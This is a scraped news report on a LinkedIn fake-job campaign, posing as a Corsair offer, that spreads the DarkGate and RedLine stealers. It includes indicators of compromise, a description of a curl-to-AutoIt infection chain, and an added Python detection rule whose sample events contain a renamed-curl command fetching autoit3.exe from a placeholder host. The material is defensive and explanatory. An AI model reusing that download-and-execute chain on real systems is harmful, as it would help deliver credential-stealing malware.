Scrape Timestamp (UTC): 2023-10-20 12:52:23.439
Original Article Text
Fake Corsair job offers on LinkedIn push DarkGate malware.

A threat actor is using fake LinkedIn posts and direct messages about a Facebook Ads specialist position at hardware maker Corsair to lure people into downloading info-stealing malware like DarkGate and RedLine.

Cybersecurity company WithSecure detected and tracked the group's activity, showing in a report today that it is linked to Vietnamese cybercriminal groups responsible for the ‘Ducktail’ campaigns first spotted last year. These campaigns aim to steal valuable Facebook business accounts that can be used for malvertising or sold to other cybercriminals.

DarkGate was first spotted in 2017, but its deployment remained limited until June 2023, when its author decided to sell access to the malware to a larger audience. Recent examples of DarkGate's use include phishing attacks through Microsoft Teams that push the payload, and the use of compromised Skype accounts to send VBS scripts that trigger an infection chain leading to the malware.

Corsair lure

The Vietnamese threat actors mainly targeted users in the U.S., the U.K., and India who hold social media management positions and are likely to have access to Facebook business accounts. The lure is delivered over LinkedIn and involves a job offer at Corsair.

Targets are tricked into downloading malicious files from a URL (“g2[.]by/corsair-JD”) that redirects to Google Drive or Dropbox to drop a ZIP file (“Salary and new products.8.4.zip”) containing a PDF or DOCX document and a TXT file with the following names:

WithSecure researchers analyzed the metadata of the above files and found leads to RedLine stealer distribution.

The downloaded archive contains a VBS script, possibly embedded in the DOCX file, that copies and renames ‘curl.exe’ to a new location and uses it to download ‘autoit3.exe’ and a compiled AutoIt3 script.
The executable launches the script, which de-obfuscates itself and constructs DarkGate from strings present in the script. Thirty seconds after installation, the malware attempts to uninstall security products from the compromised system, indicating an automated process.

LinkedIn introduced features late last year to fight abuse on the platform that can help users determine whether an account is suspicious or fake. However, it falls on users to check the verified information before engaging in communication with a new account.

WithSecure has released a list of indicators of compromise (IoCs) that could help organizations defend against activity from this threat actor. The details include IP addresses, domains used, URLs, file metadata, and names of archives.
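The chain described above (a copied and renamed curl.exe fetching autoit3.exe and a compiled script, launched from a VBS script host) leaves a recognisable footprint in process-creation telemetry. The following detection logic is an added example, not code from the article or the WithSecure report; it assumes Sysmon Event ID 1 style field names (Image, OriginalFileName, ParentImage, CommandLine) and runs over constructed sample events.

```python
# Added example: flag process-creation events matching the curl.exe -> AutoIt3 chain.
# Field names follow Sysmon Event ID 1 conventions; SAMPLE_EVENTS is constructed
# sample data, not real telemetry from the campaign.
import ntpath

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}


def _base(path):
    # Case-insensitive basename of a Windows path (works on any host OS).
    return ntpath.basename(path).lower()


def classify(event):
    """Return the list of reasons this event resembles a stage of the chain."""
    reasons = []
    image = _base(event.get("Image", ""))
    original = event.get("OriginalFileName", "").lower()
    parent = _base(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "").lower()
    # Stage 1: curl.exe was copied and renamed; the PE's OriginalFileName
    # version-info field still reads curl.exe while the on-disk name differs.
    if original == "curl.exe" and image != "curl.exe":
        reasons.append("renamed curl.exe")
    # Stage 2: curl (renamed or not) fetching the AutoIt interpreter or a
    # compiled script (.a3x is the usual compiled-script extension; assumption,
    # the article names no extension).
    if original == "curl.exe" and ("autoit3.exe" in cmd or ".a3x" in cmd):
        reasons.append("curl fetching AutoIt components")
    # Stage 3: the AutoIt interpreter started by a script host, as the VBS does.
    if image == "autoit3.exe" and parent in SCRIPT_HOSTS:
        reasons.append("autoit3.exe spawned by script host")
    return reasons


def scan(events):
    """Return (index, reasons) for every event that triggers at least one rule."""
    return [(i, classify(e)) for i, e in enumerate(events) if classify(e)]


SAMPLE_EVENTS = [  # constructed; URL and paths are placeholders
    {"Image": r"C:\Windows\System32\curl.exe", "OriginalFileName": "curl.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine": "curl.exe -V"},
    {"Image": r"C:\Users\Public\win.exe", "OriginalFileName": "curl.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"win.exe -o C:\Users\Public\autoit3.exe http://placeholder.invalid/a"},
    {"Image": r"C:\Users\Public\autoit3.exe", "OriginalFileName": "AutoIt3.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"autoit3.exe C:\Users\Public\script.a3x"},
]

if __name__ == "__main__":
    for idx, why in scan(SAMPLE_EVENTS):
        print(idx, why)
```

The first sample (a plain curl version check from cmd.exe) is intentionally benign and should not trigger; the other two each hit one or more stages.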
Daily Brief Summary
Cybersecurity firm WithSecure has observed a threat actor using fake LinkedIn posts and messages about a position at hardware maker Corsair to distribute info-stealing malware such as DarkGate and RedLine.
The threat actor is associated with Vietnamese cybercriminal groups responsible for the 'Ducktail' campaigns, which aim to steal Facebook business accounts for malvertising or resale.
Since its creator started selling access to DarkGate in June 2023, the malware has been used in phishing attacks via Microsoft Teams and has been spread through compromised Skype accounts.
Main targets of these malicious activities are users located in the U.S., U.K., and India, particularly those in social media management positions with likely access to Facebook business accounts.
Victims are tricked into downloading a malicious file containing a VBS script from a URL that redirects to Google Drive or Dropbox.
WithSecure's analysis of the file metadata links these activities to RedLine stealer distribution; separately, the malware attempts to uninstall security products from the compromised system 30 seconds after installation.
To help organizations protect against this threat, WithSecure has published a list of indicators of compromise, including IP addresses, URLs, file metadata, and names of archives.